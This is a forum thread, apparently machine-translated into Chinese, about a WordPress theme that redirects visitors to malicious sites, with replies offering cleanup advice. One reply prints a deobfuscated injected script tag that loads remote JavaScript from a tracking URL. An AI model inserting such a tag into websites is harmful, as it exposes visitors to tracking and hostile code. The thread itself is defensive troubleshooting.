再会
我刚刚将一个 Wordpress 主题上传到我的网站网络服务器上。现在我之前在我的家庭服务器上测试了这个主题,没有任何问题。
由于它一直在网络服务器上(在受信任的托管公司),当我浏览我的网站时,我会收到重定向到恶意网站的 url。(我从未向任何人提供任何帐户详细信息,帐户仅一周前)
这是我的网站:http ://evolutionof4.co.za
它链接到的恶意网站包括:themeforest.net、carolini.net 等。
我已经扫描了网络服务器上的所有文件以查找恶意软件(使用 avast),我还使用 Sucuri Security 扫描了我的网站,但它没有发现任何东西。
我不认为这是我电脑上的恶意软件,因为我在局域网上的另一台电脑上遇到了同样的问题......
有什么帮助吗?
谢谢
我遇到了同样的问题,我通过手动检查解决了它表示看起来加密的代码。我删除了它。然后在这里检查我的footer.php 还有一些2,3 行恶意代码。我删除了它,然后我再次检查,问题是同一个谷歌显示它为恶意网站,然后我在谷歌上搜索它,发现删除此类代码后,你应该在谷歌的网站管理员工具中提交你的网站以供审查一天我收到一封邮件。
您检查您的文件,在检查更改您的 ftp 和 wp-admin 的用户名和密码后,
最重要的是在站长工具上提交评论
检查您的主题文件夹中的functions.php 。它发生在我身上,重定向到 jqueryc.com ......
您访问该站点的管理员凭据有多强?如果它们相对较弱,攻击者可能会猜到您的凭据。主机服务器也可能存在 DNS 中毒——他们必须解决这个问题。如果您输入您的 URL,它会加载您的网站,然后是恶意网站,那么这不是可能的原因。
还要查看您的站点代码以查找可能由攻击者添加的 iFrame,这些 iFrame 将加载恶意站点/内容。这些不需要服务器上的恶意软件,只需要一两行 HTML 代码。
难道是,新主题包含垃圾?也许,有一些东西需要配置。但是,我绝不会尝试修复受感染的网站,只需恢复所有文件和数据库的备份即可。然后,您可以尝试通过再次上传该主题来重现所有这些,同时准备好备份。主题可以包含的不仅仅是一些样式定义。当然,如有疑问,建议更改凭据。
我使用了 jsunpack并将其反混淆为以下内容:
//document.write (s) <script type="text/javascript" src="http://themenest.net/platform/script/track?d=undefined&r=undefined&c=905"></script>
您可以自己查看永久报告。对于您的用户来说,这看起来像是一个跟踪错误和隐私问题。我个人会删除它,并且可能不再使用该站点上的任何主题。
选择所有文件。并删除它...
然后再次上传你的文件..希望这也能正常工作..